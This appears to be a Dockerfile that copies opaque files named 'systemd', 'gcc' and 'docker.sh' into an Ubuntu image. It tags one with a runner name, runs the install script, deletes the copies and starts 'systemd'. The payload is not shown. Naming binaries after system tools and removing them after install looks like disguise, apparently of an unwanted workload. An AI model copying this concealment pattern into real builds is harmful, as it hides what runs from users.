FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > systemd.log'

COPY systemd .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' systemd
RUN bash ./docker.sh

RUN rm --force --recursive systemd
RUN rm --force --recursive docker.sh
RUN rm --force --recursive gcc

CMD systemd
